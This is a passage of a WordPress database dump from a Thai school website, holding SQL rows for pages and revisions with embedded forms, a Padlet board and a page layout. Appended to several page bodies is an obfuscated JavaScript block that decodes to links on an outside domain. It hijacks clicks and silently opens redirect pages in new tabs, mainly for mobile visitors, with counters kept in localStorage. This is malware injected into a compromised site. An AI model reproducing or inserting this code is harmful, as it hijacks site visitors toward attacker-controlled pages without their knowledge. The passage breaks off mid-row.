_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ถาม-ตอบ (Q&amp;A)','','inherit','closed','closed','','506-revision-v1','','','2024-08-06 20:56:16','2024-08-06 13:56:16','',506,'http://pakhaeng.ssk.in.th/?p=562',0,'revision','',0),
(563,1,'2024-08-06 21:08:43','2024-08-06 14:08:43','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ความคิดเห็นข้อเสนอแนะ','','publish','closed','closed','','%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b9%80%e0%b8%aa%e0%b8%99%e0%b8%ad%e0%b9%81%e0%b8%99%e0%b8%b0','','','2025-07-07 14:14:46','2025-07-07 07:14:46','',0,'http://pakhaeng.ssk.in.th/?page_id=563',0,'page','',0),
(564,1,'2024-08-06 21:08:43','2024-08-06 14:08:43','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<div class=\"padlet-embed\" style=\"border:1px solid rgba(0,0,0,0.1);border-radius:2px;box-sizing:border-box;overflow:hidden;position:relative;width:100%;background:#F4F4F4\"><p style=\"padding:0;margin:0\"><iframe src=\"https://padlet.com/embed/odvvpfpxwd0hbm6o\" frameborder=\"0\" allow=\"camera;microphone;geolocation\" style=\"width:100%;height:608px;display:block;padding:0;margin:0\"></iframe></p><div style=\"display:flex;align-items:center;justify-content:end;margin:0;height:28px\"><a href=\"https://padlet.com?ref=embed\" style=\"display:block;flex-grow:0;margin:0;border:none;padding:0;text-decoration:none\" target=\"_blank\" rel=\"noopener\"><div style=\"display:flex;align-items:center;\"><img src=\"https://padlet.net/embeds/made_with_padlet_2022.png\" width=\"114\" height=\"28\" style=\"padding:0;margin:0;background:0 0;border:none;box-shadow:none\" alt=\"สร้างขึ้นด้วย Padlet\"></div></a></div></div>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ความคิดเห็นข้อเสนอแนะ','','inherit','closed','closed','','563-revision-v1','','','2024-08-06 21:08:43','2024-08-06 14:08:43','',563,'http://pakhaeng.ssk.in.th/?p=564',0,'revision','',0),
(565,1,'2024-08-06 21:09:15','2024-08-06 14:09:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%